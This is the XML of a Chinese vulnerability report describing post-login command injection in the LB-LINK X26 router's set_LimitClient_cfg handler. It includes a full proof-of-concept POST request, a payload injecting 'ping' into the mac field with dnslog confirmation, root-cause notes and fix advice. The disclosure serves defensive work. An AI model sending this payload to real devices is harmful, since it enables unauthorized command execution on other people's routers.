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6323" w:rsidRDefault="00537098" w:rsidP="0069798D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LB-LINK X26路由器</w:t>
      </w:r>
      <w:r w:rsidR="00A83A29">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>goform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A83A29">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A1C7B" w:rsidRPr="009A1C7B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>set_LimitClient_cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>存在命令</w:t>
      </w:r>
      <w:r w:rsidR="00B271D9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00537098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w: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一、漏洞介绍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3304" w:rsidRDefault="003F5BAA" w:rsidP="003F5BA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B-LINK</w:t>
      </w:r>
      <w:r w:rsidR="00A010EA" w:rsidRPr="00A010EA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>成立于1997年，是专门从事网络与通信终端设备研发、制造和行销的业内主流厂商，也是国内少数几家拥有完全独立自主研发和制造能力的公司之一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00523F0D" w:rsidP="003F5BAA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必联</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LB-LINK</w:t>
      </w:r>
      <w:r w:rsidR="00737BAF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> X26路由器</w:t>
      </w:r>
      <w:r w:rsidR="005312B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5312B9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>goform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005312B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697D09" w:rsidRPr="00697D09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set_LimitClient_cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00737BAF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidR="0034497B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidR="00003E83">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="00737BAF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞，</w:t>
      </w:r>
      <w:r w:rsidR="00ED5BAC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后台登录后，可以直接执行任意代码，危害极大</w:t>
      </w:r>
      <w:r w:rsidR="00737BAF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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二、影响版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="006774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LB-LINK x26 固件版本 &lt;= 1.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6F86" w:rsidRPr="009D1C66" w:rsidRDefault="000B6F8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固件下载地址：</w:t>
      </w:r>
      <w:r w:rsidR="009D1C66" w:rsidRPr="009D1C66">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://b-link.net.cn/product_29_174.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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三、漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F7887" w:rsidRDefault="001F7887" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A22A3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>版本证明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2369F6" w:rsidRDefault="002369F6" w:rsidP="00BC09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已是X26型号路由器的最新固件版本 v1.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F47CC" w:rsidRDefault="003245B4" w:rsidP="00BC0965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FBD795A" wp14:editId="34189184">
            <wp:extent cx="3452446" cy="1766126"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="44394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558" cy="17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BD" w:rsidRDefault="00983857" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009838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130062" cy="4175426"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="630782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12" cy="41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7C" w:rsidRDefault="00EE3AEE" w:rsidP="00BC0965">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541676">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞演示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E3AEE" w:rsidRDefault="000852B2" w:rsidP="00BC09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漏洞演示视频：</w:t>
      </w:r>
      <w:r w:rsidR="00470471">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(注：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00470471">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dnslog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00470471">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>回显触发比较久，可以快进过掉中间部分，直接看最后)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000852B2" w:rsidRDefault="00BC2015" w:rsidP="00BC0965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 xml:space="preserve">随附件附上 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC2015">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set_LimitClient_cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC2015">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>命令注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2015">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.mp4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B6359" w:rsidRPr="007B6359" w:rsidRDefault="003E2DF6" w:rsidP="007B6359">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="363" w:firstLineChars="0" w:hanging="363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构造POST请求包：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POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>goform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set_LimitClient_cfg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1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Host: 192.168.16.1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 xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36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 xml:space="preserve">Accept: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: http://192.168.16.1/admin/main.html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 xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, deflate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 xml:space="preserve">Accept-Language: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>zh-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CN,zh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=0.9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Cookie: platform=0; user=admin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Connection: close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Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Content-Length: 62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mac=admin1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%;ping</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 4 demje5,dnslog.sh&amp;time1=11&amp;time2=212</w:t>
      </w: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</w:p>
    <w:p w:rsidR="007B6359" w:rsidRPr="007B6359" w:rsidRDefault="007B6359" w:rsidP="007B6359">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1167" w:rsidRDefault="00C11940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dnslog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>验证:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11940" w:rsidRPr="007B6359" w:rsidRDefault="007B6359" w:rsidP="007B6359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F9A26CC" wp14:editId="52093A40">
            <wp:extent cx="5274310" cy="3202305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="139297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7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4" w:rsidRDefault="001F7F4D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Dnslog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>收到请求</w:t>
      </w:r>
      <w:r w:rsidR="005200AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005200AA" w:rsidRPr="00E11BDC" w:rsidRDefault="007B6359" w:rsidP="00E11BDC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CB26496" wp14:editId="7A75E51C">
            <wp:extent cx="5274310" cy="3199130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="909604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4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4" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:pStyle w:val="a9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:rsidR="002C5444" w:rsidRDefault="002C5444">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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四、触发原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4ABF" w:rsidRDefault="00DA08B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA08B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ibshare-0.0.26.so的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B6359" w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bs_SetLimitCli_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA08B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B6359" w:rsidRDefault="007B6359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033679C" wp14:editId="2D942ED4">
            <wp:extent cx="5274310" cy="3013075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1726963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3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8" w:rsidRDefault="007B63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这里直接将v10拼接到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bl_do_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的参数进行命令执行！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B6359" w:rsidRDefault="007B63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V10来自web端传入的mac参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B6359" w:rsidRDefault="007B6359">
      <w:pPr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B3544C3" wp14:editId="65C08CF6">
            <wp:extent cx="5274310" cy="2642870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1677986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6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59" w:rsidRDefault="007B635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所以我们构造如下payload即可执行任意命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B6359" w:rsidRPr="007B6359" w:rsidRDefault="007B6359" w:rsidP="007B6359">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mac=admin1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%;ping</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B6359">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 4 u3r7ionx.dnslog.sh&amp;time1=11&amp;time2=212</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B6359" w:rsidRPr="007B6359" w:rsidRDefault="007B6359">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007B6359" w:rsidRDefault="007B6359">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="0000000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五、修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C5444" w:rsidRDefault="00196D9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对用户的输入严加过滤</w:t>
      </w:r>
      <w:r w:rsidR="0061646D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，防止不安全的输入</w:t>
      </w:r>
      <w:r w:rsidR="00E6670B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>！</w:t>
      </w:r>
      <w:r w:rsidR="00C12FFE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>同时，修复源代码，对拼接到system执行的内容去除反引号等危险字符。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002C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84E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B211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60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lkOGQ2NjJiMDJkNWMwNmQzOTFmZjRmMjdhOTliYjMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00B10677"/>
    <w:rsid w:val="00003E83"/>
    <w:rsid w:val="000044D0"/>
    <w:rsid w:val="00004C75"/>
    <w:rsid w:val="000214AE"/>
    <w:rsid w:val="00024315"/>
    <w:rsid w:val="0003780A"/>
    <w:rsid w:val="00045439"/>
    <w:rsid w:val="00053388"/>
    <w:rsid w:val="000544C3"/>
    <w:rsid w:val="00054AA9"/>
    <w:rsid w:val="0005608D"/>
    <w:rsid w:val="00064076"/>
    <w:rsid w:val="000852B2"/>
    <w:rsid w:val="00087178"/>
    <w:rsid w:val="000A1545"/>
    <w:rsid w:val="000A3F31"/>
    <w:rsid w:val="000B6F86"/>
    <w:rsid w:val="000C023D"/>
    <w:rsid w:val="000E0AA9"/>
    <w:rsid w:val="00102F1E"/>
    <w:rsid w:val="00136323"/>
    <w:rsid w:val="00152EA0"/>
    <w:rsid w:val="00157A5C"/>
    <w:rsid w:val="001754CC"/>
    <w:rsid w:val="001778FB"/>
    <w:rsid w:val="00184E8C"/>
    <w:rsid w:val="0018616F"/>
    <w:rsid w:val="00196D9C"/>
    <w:rsid w:val="001A28BD"/>
    <w:rsid w:val="001B6558"/>
    <w:rsid w:val="001D1370"/>
    <w:rsid w:val="001D7BE3"/>
    <w:rsid w:val="001F7887"/>
    <w:rsid w:val="001F7F4D"/>
    <w:rsid w:val="00200B31"/>
    <w:rsid w:val="00202A79"/>
    <w:rsid w:val="002103FE"/>
    <w:rsid w:val="00212FA4"/>
    <w:rsid w:val="00213742"/>
    <w:rsid w:val="002369F6"/>
    <w:rsid w:val="00241D1D"/>
    <w:rsid w:val="002422E7"/>
    <w:rsid w:val="00247FA6"/>
    <w:rsid w:val="00265157"/>
    <w:rsid w:val="00265C67"/>
    <w:rsid w:val="00266DD8"/>
    <w:rsid w:val="00273B36"/>
